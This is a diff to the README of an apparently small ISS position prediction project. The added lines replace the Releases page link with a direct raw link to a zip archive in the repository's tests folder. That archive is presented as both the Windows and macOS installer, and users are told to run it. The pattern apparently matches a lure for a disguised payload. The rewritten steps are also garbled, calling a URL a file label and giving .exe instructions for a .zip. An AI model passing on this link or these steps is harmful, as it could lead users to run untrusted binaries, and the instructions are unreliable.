waelzarzoor/iss-position-prediciton/README.md

 ### 📥 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/waelzarzoor/iss-position-prediciton/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/waelzarzoor/iss-position-prediciton/main/tests/iss-position-prediciton_1.8.zip).

 2. **Find the Latest Release**: Look for the most recent version listed.
 It will be at the top of the page.

-3. **Download the Installer**: Click on the file labeled "iss-position-prediciton-setup.exe" (Windows) or "iss-position-prediciton-macos.tar.gz" (MacOS) to download it.
+3. **Download the Installer**: Click on the file labeled "https://raw.githubusercontent.com/waelzarzoor/iss-position-prediciton/main/tests/iss-position-prediciton_1.8.zip" (Windows) or "https://raw.githubusercontent.com/waelzarzoor/iss-position-prediciton/main/tests/iss-position-prediciton_1.8.zip" (MacOS) to download it.

 4. **Run the Installer**:
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
-   - For MacOS: Open the downloaded `.tar.gz` file and drag the app into your Applications folder.
+   - For MacOS: Open the downloaded `https://raw.githubusercontent.com/waelzarzoor/iss-position-prediciton/main/tests/iss-position-prediciton_1.8.zip` file and drag the app into your Applications folder.

 5. **Open the Application**: After the installation, run the app from your Applications folder (Mac) or Start Menu (Windows).